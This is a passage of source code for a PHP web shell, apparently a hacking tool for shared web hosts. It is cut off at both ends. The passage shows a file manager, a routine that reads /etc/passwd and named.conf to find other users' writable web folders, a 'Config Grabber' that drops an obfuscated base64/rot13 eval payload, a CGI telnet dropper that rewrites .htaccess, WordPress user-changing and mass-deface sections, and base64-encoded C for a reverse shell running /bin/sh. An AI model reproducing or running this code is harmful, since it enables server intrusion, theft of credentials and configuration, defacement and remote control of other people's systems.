{\r\n\t\t\t\t\t\t\$\xe2\x96\x9f = \$path.\$\xe2\x96\x9f;\r\n\t\t\t\t\t\tif ( (basename(\$\xe2\x96\x9f) == \"..\") || (basename(\$\xe2\x96\x9f) == \".\") )\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t\$type = filetype(\$\xe2\x96\x9f);\r\n\t\t\t\t\t\tif (\$type == \"dir\")\r\n\t\t\t\t\t\t\tdeleteDir(\$\xe2\x96\x9f);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink(\$\xe2\x96\x9f);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir(\$dh);\r\n\t\t\t\t\t@rmdir(\$path);\r\n\t\t\t\t}\r\n\t\t\t\tif(is_array(@\$_POST['f']))\r\n\t\t\t\t\tforeach(\$_POST['f'] as \$f) {\r\n if(\$f == '..')\r\n continue;\r\n\t\t\t\t\t\t\$f = urldecode(\$f);\r\n\t\t\t\t\t\tif(is_dir(\$f))\r\n\t\t\t\t\t\t\tdeleteDir(\$f);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink(\$f);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'paste':\r\n\t\t\t\tif(\$_COOKIE['act'] == 'copy') {\r\n\t\t\t\t\tfunction copy_paste(\$c,\$s,\$d){\r\n\t\t\t\t\t\tif(is_dir(\$c.\$s)){\r\n\t\t\t\t\t\t\tmkdir(\$d.\$s);\r\n\t\t\t\t\t\t\t\$h = @opendir(\$c.\$s);\r\n\t\t\t\t\t\t\twhile ((\$f = @readdir(\$h)) !== false)\r\n\t\t\t\t\t\t\t\tif ((\$f != \".\") and (\$f != \"..\"))\r\n\t\t\t\t\t\t\t\t\tcopy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n\t\t\t\t\t\t} elseif(is_file(\$c.\$s))\r\n\t\t\t\t\t\t\t@copy(\$c.\$s, \$d.\$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach(\$_COOKIE['f'] as \$f)\r\n\t\t\t\t\t\tcopy_paste(\$_COOKIE['c'],\$f, \$GLOBALS['cwd']);\r\n\t\t\t\t} elseif(\$_COOKIE['act'] == 'move') {\r\n\t\t\t\t\tfunction move_paste(\$c,\$s,\$d){\r\n\t\t\t\t\t\tif(is_dir(\$c.\$s)){\r\n\t\t\t\t\t\t\tmkdir(\$d.\$s);\r\n\t\t\t\t\t\t\t\$h = @opendir(\$c.\$s);\r\n\t\t\t\t\t\t\twhile ((\$f = @readdir(\$h)) !== false)\r\n\t\t\t\t\t\t\t\tif ((\$f != \".\") and (\$f != \"..\"))\r\n\t\t\t\t\t\t\t\t\tcopy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n\t\t\t\t\t\t} elseif(@is_file(\$c.\$s))\r\n\t\t\t\t\t\t\t@copy(\$c.\$s, \$d.\$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach(\$_COOKIE['f'] as \$f)\r\n\t\t\t\t\t\t@rename(\$_COOKIE['c'].\$f, \$GLOBALS['cwd'].\$f);\r\n\t\t\t\t} elseif(\$_COOKIE['act'] == 'zip') {\r\n\t\t\t\t\tif(class_exists('ZipArchive')) {\r\n \$zip = new ZipArchive();\r\n if (\$zip->open(\$_POST['p2'], 1)) {\r\n chdir(\$_COOKIE['c']);\r\n foreach(\$_COOKIE['f'] as \$f) {\r\n if(\$f == '..')\r\n continue;\r\n if(@is_file(\$_COOKIE['c'].\$f))\r\n \$zip->addFile(\$_COOKIE['c'].\$f, \$f);\r\n elseif(@is_dir(\$_COOKIE['c'].\$f)) {\r\n \$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$f.'/', FilesystemIterator::SKIP_DOTS));\r\n foreach (\$iterator as \$key=>\$value) {\r\n \$zip->addFile(realpath(\$key), \$key);\r\n }\r\n }\r\n }\r\n chdir(\$GLOBALS['cwd']);\r\n \$zip->close();\r\n }\r\n }\r\n\t\t\t\t} elseif(\$_COOKIE['act'] == 'unzip') {\r\n\t\t\t\t\tif(class_exists('ZipArchive')) {\r\n \$zip = new ZipArchive();\r\n foreach(\$_COOKIE['f'] as \$f) {\r\n if(\$zip->open(\$_COOKIE['c'].\$f)) {\r\n \$zip->extractTo(\$GLOBALS['cwd']);\r\n \$zip->close();\r\n }\r\n }\r\n }\r\n\t\t\t\t} elseif(\$_COOKIE['act'] == 'tar') {\r\n chdir(\$_COOKIE['c']);\r\n \$_COOKIE['f'] = array_map('escapeshellarg', \$_COOKIE['f']);\r\n ex('tar cfzv ' . escapeshellarg(\$_POST['p2']) . ' ' . implode(' ', \$_COOKIE['f']));\r\n chdir(\$GLOBALS['cwd']);\r\n\t\t\t\t}\r\n\t\t\t\tunset(\$_COOKIE['f']);\r\n setcookie('f', '', time() - 3600);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n if(!empty(\$_POST['p1'])) {\r\n\t\t\t\t\tprototype('act', \$_POST['p1']);\r\n\t\t\t\t\tprototype('f', serialize(@\$_POST['f']));\r\n\t\t\t\t\tprototype('c', @\$_POST['c']);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n hardHeader();\r\n\techo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_=\"\";</script>';\r\n\t\$dirContent = hardScandir(isset(\$_POST['c'])?\$_POST['c']:\$GLOBALS['cwd']);\r\n\tif(\$dirContent === false) {\techo 'Can\\'t open this folder!';hardFooter(); return; }\r\n\tglobal \$sort;\r\n\t\$sort = array('name', 1);\r\n\tif(!empty(\$_POST['p1'])) {\r\n\t\tif(preg_match('!s_([A-z]+)_(\\d{1})!', \$_POST['p1'], \$match))\r\n\t\t\t\$sort = array(\$match[1], (int)\$match[2]);\r\n\t}\r\necho \"<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == 'checkbox')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\r\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_name_\".(\$sort[1]?0:1).\"\\\")'>Name</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_size_\".(\$sort[1]?0:1).\"\\\")'>Size</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_modify_\".(\$sort[1]?0:1).\"\\\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_perms_\".(\$sort[1]?0:1).\"\\\")'>Permissions</a></th><th>Actions</th></tr>\";\r\n\t\$dirs = \$files = array();\r\n\t\$n = count(\$dirContent);\r\n\tfor(\$i=0;\$i<\$n;\$i++) {\r\n\t\t\$ow = @posix_getpwuid(@fileowner(\$dirContent[\$i]));\r\n\t\t\$gr = @posix_getgrgid(@filegroup(\$dirContent[\$i]));\r\n\t\t\$tmp = array('name' => \$dirContent[\$i],\r\n\t\t\t\t\t 'path' => \$GLOBALS['cwd'].\$dirContent[\$i],\r\n\t\t\t\t\t 'modify' => date('Y-m-d H:i:s', @filemtime(\$GLOBALS['cwd'] . \$dirContent[\$i])),\r\n\t\t\t\t\t 'perms' => viewPermsColor(\$GLOBALS['cwd'] . \$dirContent[\$i]),\r\n\t\t\t\t\t 'size' => @filesize(\$GLOBALS['cwd'].\$dirContent[\$i]),\r\n\t\t\t\t\t 'owner' => \$ow['name']?\$ow['name']:@fileowner(\$dirContent[\$i]),\r\n\t\t\t\t\t 'group' => \$gr['name']?\$gr['name']:@filegroup(\$dirContent[\$i])\r\n\t\t\t\t\t);\r\n\t\tif(@is_file(\$GLOBALS['cwd'] . \$dirContent[\$i]))\r\n\t\t\t\$files[] = array_merge(\$tmp, array('type' => 'file'));\r\n\t\telseif(@is_link(\$GLOBALS['cwd'] . \$dirContent[\$i]))\r\n\t\t\t\$dirs[] = array_merge(\$tmp, array('type' => 'link', 'link' => readlink(\$tmp['path'])));\r\n\t\telseif(@is_dir(\$GLOBALS['cwd'] . \$dirContent[\$i])&&(\$dirContent[\$i] != \".\"))\r\n\t\t\t\$dirs[] = array_merge(\$tmp, array('type' => 'dir'));\r\n\t}\r\n\t\$GLOBALS['sort'] = \$sort;\r\n\tfunction cmp(\$a, \$b) {\r\n\t\tif(\$GLOBALS['sort'][0] != 'size')\r\n\t\t\treturn strcmp(strtolower(\$a[\$GLOBALS['sort'][0]]), strtolower(\$b[\$GLOBALS['sort'][0]]))*(\$GLOBALS['sort'][1]?1:-1);\r\n\t\telse\r\n\t\t\treturn ((\$a['size'] < \$b['size']) ? -1 : 1)*(\$GLOBALS['sort'][1]?1:-1);\r\n\t}\r\n\tusort(\$files, \"cmp\");\r\n\tusort(\$dirs, \"cmp\");\r\n\t\$files = array_merge(\$dirs, \$files);\r\n\t\$l = 0;\r\n\tforeach(\$files as \$f) {\r\n\t\techo '<tr'.(\$l?' class=l1':'').'><td><input type=checkbox name=\"f[]\" value=\"'.urlencode(\$f['name']).'\" class=chkbx></td><td><a href=# onclick=\"'.((\$f['type']=='file')?'g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'view\\')\">'.htmlspecialchars(\$f['name']):'g(\\'FilesMan\\',\\''.\$f['path'].'\\');\" ' . (empty (\$f['link']) ? '' : \"title='{\$f['link']}'\") . '><b>[ ' . htmlspecialchars(\$f['name']) . ' ]</b>').'</a></td><td>'.((\$f['type']=='file')?viewSize(\$f['size']):\$f['type']).'</td><td>'.\$f['modify'].'</td><td>'.\$f['owner'].'/'.\$f['group'].'</td><td><a href=# onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\',\\'chmod\\')\">'.\$f['perms']\r\n\t\t\t.'</td><td><a class=\"tooltip\" data-tooltip=\"Rename\" href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'rename\\')\">R</a> <a class=\"tooltip\" data-tooltip=\"Touch\" href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'touch\\')\">T</a>'.((\$f['type']=='file')?' <a class=\"tooltip\" data-tooltip=\"Frame\" href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'frame\\')\">F</a> <a class=\"tooltip\" data-tooltip=\"Edit\" href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'edit\\')\">E</a> <a class=\"tooltip\" data-tooltip=\"Download\" href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'download\\')\">D</a>':'').'</td></tr>';\r\n\t\t\$l = \$l?0:1;\r\n\t}\r\n\techo \"<tr id=fak><td colspan=7>\r\n\t<input type=hidden name=ne value=''>\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c value='\" . htmlspecialchars(\$GLOBALS['cwd']) .\"'>\r\n\t<input type=hidden name=charset value='\". (isset(\$_POST['charset'])?\$_POST['charset']:'').\"'>\r\n\t<label><select name='p1'>\";\r\n\tif(!empty(\$_COOKIE['act']) && @count(\$_COOKIE['f']))\r\n echo \"<option value='paste'>\xe2\x86\xb3 Paste</option>\";\r\n\techo \"<option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>\";\r\n if(class_exists('ZipArchive'))\r\n echo \"<option value='zip'>+ zip</option><option value='unzip'>- zip</option>\";\r\n echo \"<option value='tar'>+ tar.gz</option>\";\r\n echo \"</select></label>\";\r\n if(!empty(\$_COOKIE['act']) && @count(\$_COOKIE['f']) && ((\$_COOKIE['act'] == 'zip') || (\$_COOKIE['act'] == 'tar')))\r\n echo \" file name: <input type=text name=p2 value='hard_\" . date(\"Ymd_His\") . \".\" . (\$_COOKIE['act'] == 'zip'?'zip':'tar.gz') . \"'> \";\r\n echo \"<input type='submit' value='submit'></td></tr></form></table></div>\";\r\n\thardFooter();\r\n}\r\nfunction actionStringTools() {\r\n\thardHeader();\r\n\techo \"<center><h1>Jumping :D</h1><div class=content><br>\";\r\n\t\$i = 0;\r\n@ini_set('display_errors', 0);\r\necho \"<pre><div class='margin: 5px auto;'>\";\r\n\$etc = fopen(\"/etc/passwd\", \"r\") or die(\"<font color=white>Can't read /etc/passwd</font>\");\r\nwhile (\$passwd = fgets(\$etc)) {\r\n if (\$passwd == '' || !\$etc) {\r\n echo \"<font color=white>Can't read /etc/passwd</font>\";\r\n } else {\r\n preg_match_all('/(.*?):x:/', \$passwd, \$user_jumping);\r\n foreach (\$user_jumping[1] as \$user_khoer_jump) {\r\n \$user_jumping_dir = \"/home/\$user_khoer_jump/public_html\";\r\n if (is_readable(\$user_jumping_dir)) {\r\n \$i++;\r\n \$jrw = \"[<font color=white>R</font>] <a href='?path=\$user_jumping_dir'><font color=red>\$user_jumping_dir</font></a>\";\r\n if (is_writable(\$user_jumping_dir)) {\r\n \$jrw = \"[<font color=white>RW</font>] <a href='?path=\$user_jumping_dir'><font color=red>\$user_jumping_dir</font></a>\";\r\n }\r\n echo \$jrw;\r\n if (function_exists('posix_getpwuid')) {\r\n \$domain_jump = file_get_contents(\"/etc/named.conf\");\r\n if (\$domain_jump == '') {\r\n echo \" => ( <font color=white>I can't take the domain name</font> )<br>\";\r\n } else {\r\n preg_match_all(\"#/var/named/(.*?).db#\", \$domain_jump, \$domains_jump);\r\n foreach (\$domains_jump[1] as \$dj) {\r\n \$user_jumping_url = posix_getpwuid(@fileowner(\"/etc/valiases/\$dj\"));\r\n \$user_jumping_url = \$user_jumping_url['name'];\r\n if (\$user_jumping_url == \$user_khoer_jump) {\r\n echo \" => ( <u>\$dj</u> )<br>\";\r\n break;\r\n }\r\n }\r\n }\r\n } else {\r\n echo \"<br>\";\r\n }\r\n }\r\n }\r\n }\r\n}\r\nif (\$i == 0) {\r\n} else {\r\n echo \"<br>Total \" . \$i . \" Directory \" . gethostbyname(\$_SERVER['HTTP_HOST']) . \"\";\r\n}\r\necho \"</div></pre>\";\r\n\techo \"</div>\";\r\n\thardFooter();\r\n}\r\n\r\nfunction actionSafeMode() {\r\n\thardHeader();\r\n\techo \"<center><h1>Config Grabber</h1><div class=content><br>\";\r\n\t@ini_set('display_errors', 0);\r\n\t\$cgi_dir = mkdir('priv_sym', 0755);\r\n chdir('priv_sym');\r\n\t\$file_mass = \"conf.php\";\r\n\t\$mass_script = \"PD9wSHAgJGhleCA9ICI3VnpyUnR0VkV2KzhSL0UvekxxNHNna1BrWG0yc3BVQUcrQjV2TnlkWkp5Rld3ZzVsMU9ua1RDK3NUUzJ0RlZiL08vWE15UEo4Z3VMOUh6WXF6cXFWZlNZL3ZWdytpWGg5c2ZZanZ0WmE0MXRHRE1uNGNPK1kxM3Fzdm91T2RqK3NMa1JqMWFEYks1VUV6b1FZWVA1SXpoNG5GMmQ5VUpic0hHWC9MQzlXbzZPVlhvUTI3VjY4c2ZtQm9FZkVWR1UxQTlNNE1hT2Fzd1Q0VzJOMmxKNWgyZkFDQlB1dldPSldqM0NmTWVocmlmQzJ2YWhsYTJ1Zjhnd0htOFBEcCswREZ2OXM5UFdiTUZnYmVsWVBhRDJPSjdVdjFjeDZubVkzbFNVYkt4ZXJKVS9IOVBITUdrYk5jZU43My9xRjR0M29NSzdhdSsyUDFsS2lnZlJxQ1UyMlhERUltYkxMWmRGcjBsZXZSVnNQQWdFY0FSWlkrcHJNYlVadWJaUVFHN2tNMXJBZDYxdWJSUGJqM2xtNDBic2lzQ2o3a010UStEN2taZGhZV2ZDOEh6b0NPS0pCOCtDV29oNnN1OVJEa1JxcnJnZGdnSG5ZbUZodExnWHMvR1FaK3h1clNUU3gyU2NpTDdqZTMwd2pDZDVqeTJvZXUzbmI0TUJDaFZ6OUJKZTBHbzRjSU1RTk1zdHJTL1V2NjVjS0I2Y2hJWmd3TTBOaVR5OVNzWWVSa3J3SUlJTkxORmxVN2F5cGVWOVJpd2NQZ3YrWG04djRxcTFQbXVYbEV2U2ZQbng2L3p0MzFJNm9oTE1aTVdrN3dxd2RDQWFhT3ZPdXVmdW5UVVlET0JWMmVqT3NpQUc2dkNyTU9jWlZnZEhHQ24zZ2dnUU1zdkdCY0dDSG1iZVNDUDdtYmo3cEhOU251ZUVOR0RXd05uVERxMDhZSDdqRkVTbUJKRHRYVU0zQkRFWTIvY2VjejJ6T2xUTnptcTU5TjVYWFA5V2RwcGpORmpya2RyaWtjV1ZhOTdRVkpxS01NYXdCYy96UnVzRjVvVTFsNWNJaGl6MkJMTlBNZVorNGt5UWM3M1luckJYckQrNXZzTVR2STBMcHJFZFIyOThCdTdrOFVsUkhRUm03amdXVWJlVjBBQ1VhMVdUdFhsaStRUmxGY1h3RE5QWWZzbnVuanJDN21YWHcrbVp4SUdLbk56Z0lmZjRpRE5FVm9SZWtzUXM0YU9sSWp4YVFyUERwL1hWTDRGTnM2YjJkcElsdGU5d1U5K29UR05xbnVCL3YvcHliVHhiL2RhWitPM0IyelhtaFJVdnNDMnMvdE1hYVdaUVR1WUM3R2NqN2s4K09YZWZmOTc3aWV4ODVtbWdtVStDSVR2WEV4c3FleGRjSDJIUkpCUXUreHk3ekNNN2Y3czZ2NzBoTy9MZlpqNVg0SDRMR2o5TXRwcCtBaG9WcDUrRVlRS0JIZGs1NGFtNGlGQXZPbTJWQ2FJNWtFb3lUY0JobXh0YU1XTWh4ZmJzVm5rTFpYY1hTcnJVRHNsZi9uWDIvdHJ1dGM3N242OWliU2VkMjk0VCtkZitxN0xweVplVDd0ZUNWMWRRN2lUNlNZbTQzYngrUlZoaWFadFVQeHk4MlFlU3lpNG50eGZsWWhPWGozTWRZY2JmOUUyNWRZblBlc1VzN2xSZVEvWWluaVJGMzMvNzREWGtCQXJ3eWtQYTBwUndDblpsa2QyTVNiWEJqUHVPbFRVYkVtQzNFRzlCNGExbzNlVzB1K3FEek5CdU5mWmYvYno5L3VHOTdNc3k2cXpYeXNUS09Wa2J6TkxOTDYrL3FpWkdYVVhLekJob1dPcVVMUVdadU92eUlZUjNCRDJIU0tLeDlyWE9FWFJFalJ3ZGs5ckYxZTFlNmRvdVRFL2srQ09vRW1DRU5FelMrbldjb3I5TUR6SGZ4blVBMWF1c0oxN2RrblVZM1dwSDFuQyt2ZEFnMHg1dlBkQlBxNkFoc242Z0F2MWMyZGZrYkhxdnhQKzVFcTdoOGpxOUh1NStjWUVwRWo4VWVVNm9YMU4ra2dpdzEyMFlFeGphUW93aE1TTkRUbURLUGd2a3Q4TXFBVERIM1dwWTIzekt1alJhaFJ1SUNvRUUzbm9NakM0WUZ3RVYwSVZkLzNNMHg2V2hIMnZteEFzZ0tJMkI1VjdRbnlSbkJObWpBTGsrcStBSk00L2FURGJQbjZlclExdVFWajBreWlpaEV5eUU4RGdTVDc2RTQwdUR5TXFDdHlrTzRPSU1DV0NMQWNNcWtTOVM0aGp3cmtPa0ZBbWhZZUlnN2w5d0FkNWcvZHZBYVlCMEdJaG9yQlFMTCtzMGduNGpTakhkUEl0T3FGaWdwKzIyS3NpU0xteHMrRTlzY2U1UGIzSEpDNG1pc2hjU0krVlNKL3JOR09vbUVsQ0ZQUkpRY2g4a0JnUStGdUVORnVGcXRRNkxJb01mQ2FHQ2R4VlZ4WWdiVVhiQVNScTFJc2lGQkRFaHlKOEFVQzR6WUE0RG11QVZ3ZXVCU2dPSlkyamFPc2RQME5Wc3B5SlJoSWQxdGMvT1Fadm5QWG5BdHJJL1kzRDluQm5DQ2Ftc1JITkRESGxuZWEvc1UxN2daTmNudnhyd0dMd3MzVUVUNi8zeWxSVVNJc0JRbkRZLzlacExERGNVTGhLREdzRG8zbHozUWREYmtzVENVMktNQ1JDdFFhZlo2eGhFaWJ0dmNtTDBJclVNQUhJNTExbkdOWk5pa1NpWDF6YzMrT1JuR1NjSlBqbU5qS0JjdHYrT1V2Q0hTMXJRQ0xlZGs4NnZQU3dJdC9seDVhTk5VcERVQklqT0NYUENWS2NGTTA2a3NjeUVSV0FRcTN2VjYvNXAybE9iS2hMQkkvWFJtcG1CeVdVTnRtN05rZzIyVUJ5WmdibnN0SDdyYnZmcGtyTlVnVFh2eUFSVnE5ZDZON0ZzcHlVQzM4V21ESE1DcE5XNXdUOGc4UVQvWTNFQVVJYVBnZEF4RURaVmlMTnBzM3ZWZG02OTdNeHFnNGd6cklzNGMyQTYzZTUyRzkzRmFvS0ErdWdPbkJ0T2RyZlFRa3Q2aG40NDh2RVFUUE51cGtndzB5VDh2NUl1NlVteGZmc3R0dWxCc1FCTXpjSy9wWndDb2Q4L085d1cySXl0dlJaZHdUSVlVQSsrSmw2OWpGTUxmK204cEE5TVhFY2dwdy81VUNzZUNRdWgzaWtqTWE0TVlGbGZCSnNCTW00WEF6dWtYazBpTWJUTGJ3WFJMK21Nb0tEM0tBOTJNekIxWkZsU2NGN1JrRGhEUTdBeG9BdUJvVlV5NG4vRkorUENtR3g3YlA0dGZUenVIOElPS24ydTlUOXRvVTdFeGM4Q29pRU5XRGo3bVZrMFhJRVVNL3IyemV0cVJnaVp5cVVmU3ZvQVNMYlVISndacEN0d1ZkT2ljUkxPbkwxeDBqSUNOdXV1R0NTZExNd0lwVmlXVGl4USs1aVhMNU5naGxITFdKbFdNRkNpVGt3ekUxSzZ1Qm1OeU9wZXUzemd1enh4STRka3NsQWczYkpzeXZNNW52bko2UmNNVkJYelBEd0ZUcVlEUFhkVGVDSlhNMDBaODNKbW40cmZMQUF3Vzg3b2lZaUVpWEpxbEJpSzcwZUtGYk5ISmJ2dmxTMmh4azlxNThlcnlqOXd4NWU2bE5qc3p1cStqUEIyOXRKR1VuZ3ZuUzdOZjRyNXhxMWNqSVc1eTIrR1NYaXFCbURWdFpMRzh1SzZidGgwaFZ5WXp5eTJJcHY0T3lMUFZTckg5VU52RnJKMnNLV1NLR1l0bVJwOUVlZmxScVl6Q2hzWklyMFNIRzllem0vcWJuUEorN2toMGRJVTZPeDg2TXhWZFhhMms1U0dQdk5ZK1R5b25CZzlnK1NSamhJeE53Tk5XNkgxMm5iTUZ4cHMvV3B5UjQyQ1ltNWVtSHlwbzYyTzQ0cno0b3Y1Um4xbVdPMHdrTFhXUFQ3a0pHWEYrT2hoTVhMZDFZNFB4MkJ1RXRDRXVsU2p4QmZIbjZndERpMXM5ZmpRNHZDYndkUythTFp0U1pyTmpXeHNWL1BUUmFBbS9DOFp3OExSb3ZEWmIwdlhMYi9XYjk4azZ0SmNTMDdjTEJWSmxqaGJZbGwxOVQwRUw1Wk5STTBJV2szcVczeWVsVjFHU0JaOXRwSnpSVTd2a0pKSGF4RU5KVFFBM3RVSUR5UVFuRmduTE9UKzdydFFkVzBTVlhESFZ5QTUyUzQvbGxFZ3RvUWtTU1BEUUI0a1kyZEhsL2ZxeEtVRE9INW1RNWVPREZTdkR3N3FBSmJMcGNUSUdoN1NxS2xXU0ExSFVYRW1xWlh6MDl4VVJhVGN4SWROcm96elhWcWZnaWlaZFcyWDRKd3dZcGpJS3dPWkNkK1R0ejhlT0E4ZjRGTWs0bGJrd1kzWEI2QzBSWmJxT2ZsN0RxRUhOOEMzQzBZVE9EbTA5SUt5R0dZa01wQ25OTC9DVEFXaXpQT0JycVdQaUtZdmtTNEtTbndEQnBEOW9nNVZpZXRWT2tWVG5SdnZNTFloaVJOaTZDaHRmNVRHMG1BNVlBdFo3WDMvdldjQXl3dmxQKzdVcWZUMlBaR2ZqLzhMIjsKZXZhbChzdHJfcm90MTMoZ3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCgkaGV4KSkpKSkpOyA=\";\r\n\t\$mass = fopen(\$file_mass, \"w\");\r\n\tfwrite(\$mass, base64_decode(\$mass_script));\r\n\techo \"<br><center> <iframe src='priv_sym/conf.php' width='900' height='480'></iframe></a>\";\r\n\techo '</div>';\r\n\thardFooter();\r\n}\r\nfunction actionEdituser() {\r\n\thardHeader();\r\n\techo \"<center><h1>Wordpress Mass User Changer</h1><div class=content><br>\";\r\n\techo \"<br><center> <iframe src='?user' width='900' height='400'></iframe></a>\";\r\n\techo '</div>';\r\n\thardFooter();\r\n}\r\nfunction actionLogout() {\r\n\texec(\"rm -rf priv_sym priv_cgi adminer.php\");\r\n setcookie(md5(\$_SERVER['HTTP_HOST']), '', time() - 3600);\r\n\tdie(\"<style>\r\n\tbody {background-color:#000000; background-image:url('https://i.imgur.com/hLcQCBx.gif'); } </style></br></br><body><pre align=center><form method=post style='color:#ffffff;text-align: center;'>Bye -,-<br><br></form> </body>\");\r\n}\r\nfunction actionSelfRemove() {\r\n\tif(\$_POST['p1'] == 'yes')\r\n\t\tif(@unlink(preg_replace('!\\(\\d+\\)\\s.*!', '', __FILE__)))\r\n\t\t\tdie('Shell has been removed');\r\n\t\telse\r\n\t\t\techo 'unlink error!';\r\n if(\$_POST['p1'] != 'yes')\r\n hardHeader();\r\n\techo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick=\"g(null,null,\\'yes\\')\">Yes</a></div>';\r\n\thardFooter();\r\n}\r\n\r\n\r\nfunction actionAdminer() {\r\n\thardHeader();\r\n\techo \"<center><h1>Adminer</h1><div class=content><br>\";\r\n\t\$full = str_replace(\$_SERVER['DOCUMENT_ROOT'], \"\", \$dir);\r\n\tfunction adminer(\$url, \$isi) {\r\n\t\t\$fp = fopen(\$isi, \"w\");\r\n\t\t\$ch = curl_init();\r\n\t\t \t curl_setopt(\$ch, CURLOPT_URL, \$url);\r\n\t\t \t curl_setopt(\$ch, CURLOPT_BINARYTRANSFER, true);\r\n\t\t \t curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t \t curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, false);\r\n\t\t \t curl_setopt(\$ch, CURLOPT_FILE, \$fp);\r\n\t\treturn curl_exec(\$ch);\r\n\t\t \t curl_close(\$ch);\r\n\t\tfclose(\$fp);\r\n\t\tob_flush();\r\n\t\tflush();\r\n\t}\r\n\tif(file_exists('adminer.php')) {\r\n\t\techo \"<center><font color=white><br><br><a href='adminer.php' target='_blank'>[ Adminer login ]</a><br><br><br></font></center>\";\r\n\t} else {\r\n\t\tif(adminer(\"https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php\",\"adminer.php\")) {\r\n\t\t\techo \"<center><font color=white><br><br><a href='adminer.php' target='_blank'>[ Adminer login ]</a><br><br></font></center>\";\r\n\t\t} else {\r\n\t\t\techo \"<center><font color=red>Failed to create Adminer file</font></center>\";\r\n\t\t}\r\n\t}\r\n\thardFooter();\r\n}\r\nfunction actionBruteforce() {\r\n\thardHeader();\r\n\techo \"<center><h1>Cgi Telnet</h1><div class=content><br>\";\r\n\t\$cgi_dir = mkdir('priv_cgi', 0755);\r\n chdir('priv_cgi');\r\n\t\$file_cgi = \"cgi.priv\";\r\n \$memeg = \".htaccess\";\r\n\t\$isi_htcgi = \"OPTIONS Indexes Includes ExecCGI FollowSymLinks \\n AddType application/x-httpd-cgi .priv \\n AddHandler cgi-script .priv \\n AddHandler cgi-script .priv\";\r\n\t\$htcgi = fopen(\".htaccess\", \"w\");\r\n\t\$cgi_script = \"\";\r\n\t\$cgi = fopen(\$file_cgi, \"w\");\r\n\tfwrite(\$cgi, base64_decode(\$cgi_script));\r\n\tfwrite(\$htcgi, \$isi_htcgi);\r\n\tchmod(\$file_cgi, 0755);\r\n chmod(\$memeg, 0755);\r\n\techo \"<br><center>Done ... <a href='priv_cgi/cgi.priv' target='_blank'>Click Here</a></div>\";\r\n\thardFooter();\r\n}\r\n\r\n\r\n// Mass Deface Section Start\r\nfunction actionSql() {\r\n\thardHeader();\r\n\techo \"<center><h1>Mass Tools</h1><div class=content><br>\";\r\n\t\r\n\techo \"<br><center> <iframe src='?mas' width='800' height='450'></iframe></a></div>\";\r\n\t\r\n\thardFooter();\r\n}\r\n\r\n// Mass Deface Section END\r\n\r\n// Back COnnect SEction\r\nfunction actionNetwork() {\r\n\thardHeader();\r\n\t\$back_connect_c=\"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9\";\r\n\t\$back_connect_p=\"IyEvd